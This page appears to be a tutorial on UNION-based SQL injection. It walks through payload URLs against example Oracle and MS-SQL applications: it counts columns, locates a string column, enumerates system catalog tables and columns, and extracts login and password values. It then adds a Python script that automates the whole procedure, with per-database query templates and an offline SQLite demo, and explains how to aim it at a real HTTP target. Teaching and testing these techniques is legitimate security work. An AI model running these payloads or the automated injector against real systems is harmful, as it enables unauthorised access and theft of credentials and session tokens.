Extracting Useful Data

In order to extract useful data from the database, you normally need to know the names of the tables and columns containing the data you wish to access. The main enterprise DBMSs expose a rich set of database metadata (the system catalog) that you can query to discover the names of every table and column the current database user can see. The methodology for extracting useful data is the same in each case; however, the details, such as the catalog views to query and the syntax of a valid SELECT, differ between database platforms. We will examine examples of extracting useful data from Oracle and MS-SQL databases.

An Oracle Hack

Consider an HR application that allows users to perform employee searches. A typical search employs the following URL:

https://wahh-app.com/employees.asp?EmpNo=7521

This search returns the following results:

Screenshot from 2020-05-06 22:44:37

We attempt to perform a UNION attack, and so need to determine the number of columns used in the query (which may differ from the number of columns returned in the application's responses). We use NULL as the placeholder because it is compatible with every column type, and we append "from dual" because Oracle requires every SELECT to have a FROM clause. Injecting a query that returns a single column results in an error message:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL%20from%20dual--

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result columns

We continue adding NULLs to the injected query until no error message is returned, and our query is executed:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,NULL,NULL,NULL%20from%20dual--

Screenshot from 2020-05-06 23:21:01

Note the blank line which has now been added to the table, containing the NULL results from our injected query.

Having determined the number of columns, we now need to find a column that has a string data type, so that we can return arbitrary string values through it. Our first attempt is unsuccessful:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20'a',NULL,NULL,NULL%20from%20dual--

[Oracle][ODBC][Ora]ORA-01790: expression must have same datatype as corresponding expression

We target the second column, and this is successful, returning a row of data containing the input we specified:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,'a',NULL,NULL%20from%20dual--

Screenshot from 2020-05-06 23:22:36

We now have a means of extracting string data from the database. Our next step is to find out the names of the database tables that may contain interesting information. We can do this by querying the user_objects view, which lists the tables and other objects owned by the database user the application connects as (the all_objects view additionally lists objects in other schemas that this user can access):

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,object_name,object_type,NULL%20from%20user_objects--

Screenshot from 2020-05-06 23:24:00

Many of these tables may contain sensitive data, including information about employees that we cannot legitimately access given our privilege level. An obvious point of initial attack is the table called USERS, which may contain credentials. We can discover the names of the columns within this table by querying the user_tab_columns view. Note that Oracle stores unquoted identifiers in upper case, so the table name must be matched as 'USERS':

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%3d%20'USERS'--

Screenshot from 2020-05-06 23:25:05

The column names show that the USERS table does indeed contain sensitive data, including passwords and session tokens. We now have everything we need to extract any of this information. For example:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,login,password,NULL%20from%20users--

Screenshot from 2020-05-06 23:26:24

An MS-SQL Hack

Let's take a look at a similar attack being performed against an MS-SQL database. Consider a retailing application that allows users to search a product catalog. A typical search uses the following URL:

https://wahh-app.com/products.asp?q=hub

This search returns the following results:

Screenshot from 2020-05-06 23:29:49

First, we need to determine the required number of columns. Here the parameter is used inside a quoted string literal, so the payload begins with a single quote to close that literal, and the trailing -- comments out the remainder of the original query. Testing for a single column results in an error message:

https://wahh-app.com/products.asp?q=hub'%20union%20select%20null--

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

We add a second NULL, and our query is executed, generating an additional item in the results table:

https://wahh-app.com/products.asp?q=hub'%20union%20select%20null,null--

Screenshot from 2020-05-06 23:31:17

We now verify that the first column in the query contains string data:

https://wahh-app.com/products.asp?q=hub'%20union%20select%20'a',null--

Screenshot from 2020-05-06 23:32:39

Our next step is to find out the names of the database tables that may contain interesting information. We can do this by querying the sysobjects table, which contains details of all objects within the database. To retrieve only the user-defined tables, we specify the type U (on SQL Server 2005 and later, sysobjects and syscolumns are compatibility views kept for backward compatibility; sys.tables, sys.columns and INFORMATION_SCHEMA.TABLES are the current catalog views and work equally well here):

https://wahh-app.com/products.asp?q=hub'%20union%20select%20name,null%20from%20sysobjects%20where%20xtype%3d'U'--

Screenshot from 2020-05-06 23:33:41

Here again, the Users table is an obvious place to begin extracting data. To discover the names of the columns within the Users table, we join sysobjects to the syscolumns table on the object id:

https://wahh-app.com/products.asp?q=hub'%20UNION%20select%20b.name,null%20from%20sysobjects%20a,syscolumns%20b%20where%20a.id=b.id%20and%20a.name%3d'users'--

Screenshot from 2020-05-06 23:34:44

We now have everything we need to extract the information within the Users table. For example:

https://wahh-app.com/products.asp?q=hub'%20UNION%20select%20login,password%20from%20users--

Screenshot from 2020-05-06 23:35:51
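The Oracle and MS-SQL walkthroughs above follow one procedure (find the column count, find a string column, list tables, list columns, dump rows) with only the SQL details changing. The script below, an added example that is not part of the original page, automates that procedure behind a pluggable send() callable and keeps the per-DBMS details in a table: the "oracle" and "mssql" entries reproduce the catalog queries used above, and a third "sqlite" entry lets the whole thing run offline against a constructed stand-in for employees.asp (an in-memory SQLite database with made-up employee and user rows, queried by string concatenation). Two details of that stand-in are assumptions for the demonstration only: SQLite does not enforce matching column types across a UNION, so the demo page "renders" the first column as an integer to reproduce the effect of ORA-01790 on a non-string column, and SQLite's pragma_table_info() plays the role of user_tab_columns.

```python
import sqlite3
from typing import Callable, Dict, List, Optional, Tuple

# What the vulnerable page hands back: (rows, None) on success, (None, error text) on failure.
Response = Tuple[Optional[List[tuple]], Optional[str]]

# Per-DBMS details of the UNION technique; the probing logic in UnionInjector is shared.
DIALECTS = {
    "oracle": {  # every SELECT needs a FROM (dual); user_* views cover the current schema only
        "dual": " from dual", "concat": "||",
        "tables": ("object_name", "user_objects where object_type = 'TABLE'"),
        "columns": ("column_name", "user_tab_columns where table_name = '{table}'"),
    },
    "mssql": {   # legacy catalog views; sys.tables and sys.columns are the current equivalents
        "dual": "", "concat": "+",
        "tables": ("name", "sysobjects where xtype = 'U'"),
        "columns": ("b.name", "sysobjects a, syscolumns b where a.id = b.id and a.name = '{table}'"),
    },
    "sqlite": {  # stands in for the real DBMS in the offline demonstration below (assumption)
        "dual": "", "concat": "||",
        "tables": ("name", "sqlite_master where type = 'table'"),
        "columns": ("name", "pragma_table_info('{table}')"),
    },
}


class UnionInjector:
    """Drives the column-count, string-column and catalog steps through one send() callable."""

    def __init__(self, send: Callable[[str], Response], prefix: str, dialect: str):
        self.send, self.prefix, self.d = send, prefix, DIALECTS[dialect]
        self.baseline = set(send(prefix)[0] or [])  # legitimate rows, filtered out of results
        self.ncols = self.string_col = None          # filled in by the two probes below

    def _payload(self, exprs: List[str], source: str) -> str:
        return f"{self.prefix} UNION SELECT {','.join(exprs)}{source}--"

    def find_column_count(self, max_cols: int = 20) -> int:
        for n in range(1, max_cols + 1):  # keep adding NULLs until the error disappears
            if self.send(self._payload(["NULL"] * n, self.d["dual"]))[1] is None:
                self.ncols = n
                return n
        raise RuntimeError(f"no column count up to {max_cols} was accepted")

    def find_string_column(self, marker: str = "a") -> int:
        for i in range(self.ncols):  # put a string literal in each slot in turn
            exprs = ["NULL"] * self.ncols
            exprs[i] = f"'{marker}'"
            rows, err = self.send(self._payload(exprs, self.d["dual"]))
            if err is None and any(marker in row for row in rows):
                self.string_col = i
                return i
        raise RuntimeError("no slot accepted a string literal")

    def fetch(self, expr: str, source: str) -> List[str]:
        """Return the values of `expr` from `source`, smuggled out through the string slot."""
        exprs = ["NULL"] * self.ncols
        exprs[self.string_col] = expr
        rows, err = self.send(self._payload(exprs, " from " + source))
        if err:
            raise RuntimeError(err)
        return sorted(r[self.string_col] for r in rows if r not in self.baseline)

    def tables(self) -> List[str]:
        return self.fetch(*self.d["tables"])

    def columns(self, table: str) -> List[str]:
        return self.fetch(self.d["columns"][0], self.d["columns"][1].format(table=table))

    def dump(self, table: str, cols: List[str]) -> List[str]:
        # One string slot is enough: concatenate the wanted columns with a separator.
        sep = f"{self.d['concat']}':'{self.d['concat']}"
        return self.fetch(sep.join(cols), table)


def build_demo_app() -> Callable[[str], Response]:
    """Constructed stand-in for employees.asp: in-memory SQLite behind a concatenated query."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table employees(id integer, name text, dept text, phone text);
        insert into employees values (7521, 'Ward', 'Sales', '555-0102');
        create table users(login text, password text, session text);
        insert into users values ('admin', 's3cret', 'tok1'), ('ward', 'wardpw', 'tok2');
    """)

    def send(param: str) -> Response:
        sql = "select id, name, dept, phone from employees where id = " + param  # the injection
        try:
            rows = db.execute(sql).fetchall()
            # The page renders EmpNo as a number (constructed detail), so a string literal in
            # slot 0 fails here much as ORA-01790 would on Oracle; slot 1 is the first that works.
            [int(r[0]) for r in rows if r[0] is not None]
            return rows, None
        except (sqlite3.Error, ValueError) as e:
            return None, str(e)
    return send


def run_demo() -> Dict[str, object]:
    inj = UnionInjector(build_demo_app(), prefix="7521", dialect="sqlite")
    return {"ncols": inj.find_column_count(), "string_col": inj.find_string_column(),
            "tables": inj.tables(), "users_cols": inj.columns("users"),
            "creds": inj.dump("users", ["login", "password"])}
```

Calling run_demo() reproduces the Oracle walkthrough against the constructed database: four columns, the second one accepting strings, the employees and users tables, the users columns and finally the login:password pairs. Against a real target, send() would issue the HTTP request with the parameter value (the prefix is "7521" for the numeric EmpNo case and "hub'" for the quoted q case) and return the parsed result rows or the ODBC error text from the page. The dump() step differs from the page deliberately: the page had two usable string columns, whereas the script concatenates the wanted columns through a single one, which is the more common situation.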

Next: Exploiting ODBC Error Messages (MS-SQL Only)